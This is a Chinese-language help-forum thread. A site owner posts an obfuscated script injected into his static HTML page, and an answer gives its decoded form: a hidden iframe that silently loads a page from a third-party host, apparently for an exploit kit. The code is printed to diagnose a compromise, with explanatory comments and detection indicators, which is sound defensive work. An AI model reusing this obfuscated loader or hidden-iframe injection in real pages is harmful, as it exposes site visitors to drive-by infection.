我的网站有一个静态HTML网页,最近我无法在自己的Windows XP计算机上加载该网站。Norton Antivirus阻止了该网站,并将其报告为“Web Attack:Blackhole Toolkit Website 7”。我下载了服务器上的index.htm页面,与同一页面的本地副本比较后,发现在我编写的页面主体(body)中多出了下面这段代码:
<script>
// Injected, obfuscated loader quoted by the asker as found in the served index.htm.
// Overall shape: build a reference to eval without ever writing the word "eval",
// decode a string from an index table, then evaluate the decoded string.
//
// Step 1: a detached <div> is used as scratch storage for string fragments.
// After the three calls below its child text nodes are, in order:
// "ReferenceErr", "l", "q".
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
// Step 2: `b` is never declared in this script, so `b[2] = 21` throws inside the
// inner catch and control reaches the outer catch, the only place k is assigned.
// NOTE(review): presumably this makes the decode depend on real exception and DOM
// behaviour so that simple static scanners fail; the page does not state the intent.
try {
try {
throw 1
} catch (a) {
b[2] = 21
};
} catch (a) {
// substr(0, 0) is always "", so k is just the first text node: "ReferenceErr".
k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
// Step 3: ar is the substitution alphabet; ar2 is the payload encoded as alphabet
// indices multiplied by 4 and joined with "c" (the leading "R80" is patched to "80" below).
// NOTE(review): the alphabet as shown on this page appears to be 47 characters long
// while the largest value in ar2 is 188 (index 47), so a character (probably
// whitespace) seems to have been lost in extraction; do not rely on this copy for
// exact decoding.
ar = "\"aTBtc0.gyA:/[hi],b> vCldmwf)s{up1oE'=<r(n;N}ez";
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
// Step 4: replacing k ("ReferenceErr") with "va" + "l" turns the literal into
// "urn eval"; prefixed with "ret" the Function body is `return eval`, so e is eval.
// Because it is called through the alias e, the evaluated code runs in global scope.
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
e = Function("ret" + pau)();
// Step 5: split the index table and overwrite the marker entry "R80" with "80".
ar2 = ar2.split("c");
ar2[0] = "80";
s = "";
for (i = 0; i != ar2.length; i++) {
// The concatenated pieces spell: pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4
// parseInt("0asdceErr") is 0, so pos is simply ar2[i]/4; the k-dependent term only
// ties the decode to the exception path that set k.
e('po'.concat('s=par', 'seInt(k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
// Append the alphabet character at that index to the decoded payload.
e('s+=ar.substr(pos,1)');
}
// Step 6: the decoded string is executed as JavaScript in the visitor's browser.
// For detection, the stable indicators visible here are Function(...) used to obtain
// eval, eval of strings assembled with concat, and a long "c"-delimited number table.
e(s);
</script>
有人知道这段代码可能是怎么出现的,以及我的index.htm页面是如何被修改的吗?
谢谢, 史蒂夫
答案 0 :(得分:5)
以下是该脚本解码后最终执行的代码。我把它放在虚拟机上测试,结果收到了谷歌的恶意站点警告。绕了这么一大圈,只是为了写出下面这些内容:
// Decoded second stage as posted by the answerer: it adds an invisible iframe that
// makes the visitor's browser load a page from a third-party host.
// If a <body> element already exists, the iframe is built through the DOM;
// iframer() can be called before its definition because function declarations are hoisted.
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
// NOTE(review): the string written here is empty as shown; markup inside it may have
// been stripped when the page was rendered or extracted. Confirm against the original answer.
document.write("");
}
// Creates the iframe, points it at the remote URL and appends it to <body>.
function iframer() {
var f = document.createElement('iframe');
// Remote URL loaded in the frame; this is the network indicator to search for in
// proxy and DNS logs.
f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
// visibility:hidden together with absolute positioning at 0,0 and a 10x10 size keeps
// the frame out of the visitor's sight while the browser still loads its content.
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
// NOTE(review): deleting the injected <script> from index.htm removes this symptom
// only. The page does not show how the file was modified, so the write path to the
// site (upload credentials, hosting account, server software) still has to be
// reviewed, and deployed files compared against a known-good copy, as the asker did.
答案 1 :(得分:1)
有人入侵了您的网站——入侵的途径有很多,需要加强安全性的方面也很多。